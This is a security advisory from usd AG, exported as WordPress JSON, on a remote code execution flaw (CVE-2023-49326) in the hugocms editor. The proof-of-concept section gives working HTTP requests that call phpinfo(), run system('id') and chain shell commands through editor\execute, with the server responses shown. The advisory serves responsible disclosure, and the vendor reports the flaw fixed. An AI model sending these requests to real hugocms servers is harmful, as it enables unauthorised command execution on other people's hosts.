{"id":22915,"date":"2024-07-22T11:08:20","date_gmt":"2024-07-22T09:08:20","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=22915"},"modified":"2024-07-24T11:30:47","modified_gmt":"2024-07-24T09:30:47","slug":"usd-2023-0037","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0037\/","title":{"rendered":"usd-2023-0037"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.26.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0037 | Remote Code Execution in hugocms<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0037
Product<\/strong>: hugocms
Affected Version<\/strong>: (latest as of 25.09.2023; commit 77443d6)
Vulnerability Type<\/strong>: CWE-913: Improper Control of Dynamically-Managed Code Resources
Security Risk<\/strong>: HIGH
Vendor URL<\/strong>: https:\/\/hugoeditor.com\/<\/a>
Vendor Acknowledged Vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
Advisory Status<\/strong>: Published
CVE Number<\/strong>: CVE-2023-49326
First Published<\/strong>: 2024-07-18
Last Update<\/strong>: 2024-07-18<\/p>\n

Desciption<\/h3>\n

The application hugocms<\/em>, developed by Inter-Data, provides a frontend for the static site generator hugo<\/em> to manage posts, media, and configuration of a hugo website. The application does not provide any access-control mechanism and recommends to restrict access via a web server's basic auth capabilities.<\/p>\n

Users with access to hugocms can execute arbitrary PHP code via an unfiltered URL parameter, leading to remote code execution. The flaw is present in script hugocms\/editor.os.control.php<\/strong> and can be triggered by a GET or POST request to hugocms\/editor.control.php<\/strong>.<\/p>\n

Proof of Concept<\/h3>\n

The following request triggers execution of phpinfo()<\/strong>:<\/p>\n

\n
<\/span>GET<\/span> \/public\/edit\/hugocms\/editor.control.php?action=phpinfo<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> 10.1.1.157<\/span><\/pre>\n<\/div>\n
The following request uses PHP's system()<\/strong> function to execute commands on the host system:<\/p>\n
Request:<\/p>\n
\n
<\/span>GET<\/span> \/public\/edit\/hugocms\/editor.control.php?action=system&data=id<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> 10.1.1.157<\/span><\/pre>\n<\/div>\n
Response:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK
<\/span>Date<\/span>:<\/span> Mon, 25 Sep 2023 18:32:53 GMT
<\/span>Server<\/span>:<\/span> Apache\/2.4.57 (Debian)
<\/span>Content-Length<\/span>:<\/span> 54
<\/span>Content-Type<\/span>:<\/span> application\/json<\/span>uid=<\/span>33<\/span>(www<\/span>-<\/span>da<\/span>ta<\/span>)<\/span> <\/span>gid=<\/span>33<\/span>(www<\/span>-<\/span>da<\/span>ta<\/span>)<\/span> <\/span>groups=<\/span>33<\/span>(www<\/span>-<\/span>da<\/span>ta<\/span>)<\/span><\/pre>\n<\/div>\n
The following request uses hugocms' functions to execute commands on the host system:<\/p>\n
Request:<\/p>\n
\n
<\/span>POST<\/span> \/public\/edit\/hugocms\/editor.control.php<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> 10.1.1.157
<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8
<\/span>Content-Length<\/span>:<\/span> 42<\/span>action<\/span>=<\/span>editor\\execute<\/span>&<\/span>data<\/span>=<\/span>id+%26%26+false<\/span><\/pre>\n<\/div>\n
Response:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK
<\/span>Date<\/span>:<\/span> Mon, 25 Sep 2023 18:35:37 GMT
<\/span>Server<\/span>:<\/span> Apache\/2.4.57 (Debian)
<\/span>Content-Length<\/span>:<\/span> 91
<\/span>Content-Type<\/span>:<\/span> application\/json<\/span>{<\/span> <\/span>\"success\"<\/span>:<\/span>false<\/span>,<\/span> <\/span>\"debug\"<\/span>:<\/span>\"uid=33(www-data) gid=33(www-data) groups=33(www-data) <br \/>\"<\/span> <\/span>}<\/span><\/pre>\n<\/div>\n
Timeline<\/h3>\n
    \n
  • 2023-09-25<\/strong>: Vulnerability identified by Florian Dewald.<\/li>\n
  • 2023-10-02<\/strong>: Sent first contact request.<\/li>\n
  • 2023-10-16<\/strong>: Sent reminder email mentioning disclosure deadline.<\/li>\n
  • 2023-10-25<\/strong>: Sent another reminder stressing that vulnerabilities will be publicly disclosed.<\/li>\n
  • 2023-11-13<\/strong>: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.<\/li>\n
  • 2023-11-22<\/strong>: Reached vendor via phone, sent vulnerability information.<\/li>\n
  • 2023-12-04<\/strong>: Sent status update request to info@inter-data.de<\/li>\n
  • 2023-12-06<\/strong>: Inter-Data reports that a fix is being worked on.<\/li>\n
  • 2024-01-03<\/strong>: According to Inter-Data a fix is in the works and should be finished soon.<\/li>\n
  • 2024-01-24<\/strong>: Reached out to Inter-Data for another status update.<\/li>\n
  • 2024-01-26<\/strong>: Inter-Data reports that the vulnerability is fixed.<\/li>\n
  • 2024-07-18<\/strong>: This advisory is published.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Florian Dewald of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2023-0037 | Remote Code Execution in hugocms Advisory ID: usd-2023-0037Product: hugocmsAffected Version: (latest as of 25.09.2023; commit 77443d6)Vulnerability Type: CWE-913: Improper Control of Dynamically-Managed Code ResourcesSecurity Risk: HIGHVendor URL: https:\/\/hugoeditor.com\/Vendor Acknowledged Vulnerability: YesVendor Status: FixedAdvisory Status: PublishedCVE Number: CVE-2023-49326First Published: 2024-07-18Last Update: 2024-07-18 Desciption The application hugocms, developed by Inter-Data, provides a frontend for the […]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-22915","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22915","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=22915"}],"version-history":[{"count":4,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22915\/revisions"}],"predecessor-version":[{"id":23104,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22915\/revisions\/23104"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=22915"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}